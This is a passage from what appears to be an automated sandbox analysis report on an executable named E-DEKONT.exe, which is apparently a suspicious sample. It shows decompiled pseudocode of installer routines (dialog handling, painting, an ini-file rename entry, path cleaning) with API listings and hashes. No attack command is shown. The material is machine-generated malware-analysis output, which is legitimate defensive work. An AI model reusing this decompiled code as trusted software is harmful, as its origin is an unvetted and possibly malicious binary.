				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b214 =  *0x42b214 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040427E(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432e80;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404663(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434ee8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434ee8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b214 != 0) {
						goto L27;
					} else {
						_t116 =  *0x42c220 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404239(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040463F();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x433ebc - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404365;
				if(_t110 != 2) {
					_v8 = E0040432B;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404217(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404217(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404239( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E0040424C(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434ef4 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b214 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b214 = 0;
				return 0;
			}


















                                                                            0x004043c6
                                                                            0x004044f3
                                                                            0x00404550
                                                                            0x00404554
                                                                            0x00404621
                                                                            0x00404623
                                                                            0x00404623
                                                                            0x00404629
                                                                            0x00404629
                                                                            0x0040462c
                                                                            0x00000000
                                                                            0x00404633
                                                                            0x00404562
                                                                            0x00404568
                                                                            0x00404572
                                                                            0x0040457d
                                                                            0x00404580
                                                                            0x00404583
                                                                            0x0040458e
                                                                            0x00404591
                                                                            0x00404598
                                                                            0x004045a5
                                                                            0x004045b6
                                                                            0x004045bc
                                                                            0x004045c4
                                                                            0x004045d2
                                                                            0x004045d8
                                                                            0x004045d8
                                                                            0x00404598
                                                                            0x004045e2
                                                                            0x00000000
                                                                            0x004045ed
                                                                            0x004045f1
                                                                            0x00404601
                                                                            0x00404601
                                                                            0x00404607
                                                                            0x00404613
                                                                            0x00404613
                                                                            0x00000000
                                                                            0x00404617
                                                                            0x004045e2
                                                                            0x004044fe
                                                                            0x00000000
                                                                            0x00404510
                                                                            0x00404515
                                                                            0x0040451b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404544
                                                                            0x00404546
                                                                            0x0040454b
                                                                            0x00000000
                                                                            0x0040454b
                                                                            0x004044fe
                                                                            0x004043cc
                                                                            0x004043cf
                                                                            0x004043d4
                                                                            0x004043e5
                                                                            0x004043e5
                                                                            0x004043ed
                                                                            0x004043f0
                                                                            0x004043f4
                                                                            0x004043f7
                                                                            0x004043fb
                                                                            0x004043fe
                                                                            0x00404401
                                                                            0x00404404
                                                                            0x0040440b
                                                                            0x0040440d
                                                                            0x0040440d
                                                                            0x00404417
                                                                            0x00404424
                                                                            0x0040442e
                                                                            0x00404433
                                                                            0x00404436
                                                                            0x0040443b
                                                                            0x00404452
                                                                            0x00404459
                                                                            0x0040446c
                                                                            0x0040446f
                                                                            0x00404483
                                                                            0x0040448a
                                                                            0x0040448f
                                                                            0x00404494
                                                                            0x00404494
                                                                            0x004044a2
                                                                            0x004044b0
                                                                            0x004044c2
                                                                            0x004044c7
                                                                            0x004044d7
                                                                            0x004044d9
                                                                            0x00000000

                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
                                                                            • GetSysColor.USER32(?), ref: 00404494
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                                            • lstrlenW.KERNEL32(?), ref: 004044B5
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                                            • SendMessageW.USER32(00000000), ref: 00404537
                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                                            • SetCursor.USER32(00000000), ref: 004045B6
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                                            • SetCursor.USER32(00000000), ref: 004045D2
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                            • String ID: +C@$Call$N
                                                                            • API String ID: 3103080414-3697844480
                                                                            • Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                                            • Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
                                                                            • Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                                            • Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 90%
                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434ef4;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433ee0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434ee8;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                            0x0040100a
                                                                            0x00401039
                                                                            0x00401047
                                                                            0x0040104d
                                                                            0x00401051
                                                                            0x0040105b
                                                                            0x00401061
                                                                            0x00401064
                                                                            0x004010f3
                                                                            0x00401089
                                                                            0x0040108c
                                                                            0x004010a6
                                                                            0x004010bd
                                                                            0x004010cc
                                                                            0x004010cf
                                                                            0x004010d5
                                                                            0x004010d9
                                                                            0x004010e4
                                                                            0x004010ed
                                                                            0x004010ef
                                                                            0x004010ef
                                                                            0x00401100
                                                                            0x00401105
                                                                            0x0040110d
                                                                            0x00401110
                                                                            0x00401112
                                                                            0x00401118
                                                                            0x0040111f
                                                                            0x00401126
                                                                            0x00401130
                                                                            0x00401142
                                                                            0x00401156
                                                                            0x00401160
                                                                            0x00401165
                                                                            0x00401165
                                                                            0x00401110
                                                                            0x0040116e
                                                                            0x00000000
                                                                            0x00401178
                                                                            0x00401010
                                                                            0x00401013
                                                                            0x00401015
                                                                            0x0040101f
                                                                            0x0040101f
                                                                            0x00000000

                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                            • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                            • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                            • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405ECE Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405ECE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x4308e8 = 0x55004e;
				 *0x4308ec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4310e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4304e8, "%ls=%ls\r\n", 0x4308e8, 0x4310e8);
						_t53 = _t52 + 0x10;
						E004062A4(_t37, 0x400, 0x4310e8, 0x4310e8,  *((intOrPtr*)( *0x434ef4 + 0x128)));
						_t12 = E00405D74(0x4310e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405DF7(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405CD9(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405CD9(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D2F(_t24 + _t46, 0x4304e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E26(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405D74(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x4308e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                            0x00405ece
                                                                            0x00405ed7
                                                                            0x00405ede
                                                                            0x00405ee8
                                                                            0x00405efc
                                                                            0x00405f24
                                                                            0x00405f2f
                                                                            0x00405f33
                                                                            0x00405f53
                                                                            0x00405f5a
                                                                            0x00405f64
                                                                            0x00405f71
                                                                            0x00405f76
                                                                            0x00405f7b
                                                                            0x00405f7f
                                                                            0x00405f8e
                                                                            0x00405f90
                                                                            0x00405f9d
                                                                            0x00405fa1
                                                                            0x0040603c
                                                                            0x00000000
                                                                            0x00405fb7
                                                                            0x00405fc4
                                                                            0x00405fe8
                                                                            0x00405fec
                                                                            0x0040600b
                                                                            0x0040600f
                                                                            0x0040600f
                                                                            0x00406011
                                                                            0x0040601a
                                                                            0x00406025
                                                                            0x00406030
                                                                            0x00406036
                                                                            0x00000000
                                                                            0x00406036
                                                                            0x00405fee
                                                                            0x00405ff1
                                                                            0x00405ffc
                                                                            0x00405ff8
                                                                            0x00405ffa
                                                                            0x00405ffb
                                                                            0x00405ffb
                                                                            0x00406003
                                                                            0x00406005
                                                                            0x00000000
                                                                            0x00406005
                                                                            0x00405fcf
                                                                            0x00405fd5
                                                                            0x00000000
                                                                            0x00405fd5
                                                                            0x00405fa1
                                                                            0x00405f7f
                                                                            0x00405efe
                                                                            0x00405f09
                                                                            0x00405f12
                                                                            0x00405f16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405f16
                                                                            0x00406047

                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                                            • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                                              • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                                              • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                                            • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                                            • wsprintfA.USER32 ref: 00405F4D
                                                                            • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                            • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                                              • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\E-DEKONT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                              • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                            • String ID: %ls=%ls$[Rename]
                                                                            • API String ID: 2171350718-461813615
                                                                            • Opcode ID: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                                            • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                                            • Opcode Fuzzy Hash: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                                            • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406516 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 91%
                                                                            			E00406516(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405BCA(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405B80(L"*?|<>/\":", _t5))) == 0) {
							E00405D2F(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                            0x00406518
                                                                            0x00406521
                                                                            0x00406538
                                                                            0x00406538
                                                                            0x0040653f
                                                                            0x0040654b
                                                                            0x0040654b
                                                                            0x0040654e
                                                                            0x00406551
                                                                            0x00406556
                                                                            0x00406558
                                                                            0x00406561
                                                                            0x00406565
                                                                            0x00406582
                                                                            0x0040658a
                                                                            0x0040658a
                                                                            0x0040658f
                                                                            0x00406591
                                                                            0x00406594
                                                                            0x00406599
                                                                            0x0040659a
                                                                            0x0040659e
                                                                            0x0040659e
                                                                            0x0040659f
                                                                            0x004065a6
                                                                            0x004065a8
                                                                            0x004065af
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004065b7
                                                                            0x004065bd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004065bd
                                                                            0x004065c2

                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\E-DEKONT.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\E-DEKONT.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\E-DEKONT.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: "C:\Users\user\Desktop\E-DEKONT.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-2702186785
                                                                            • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                            • Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
                                                                            • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                            • Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040427E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040427E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
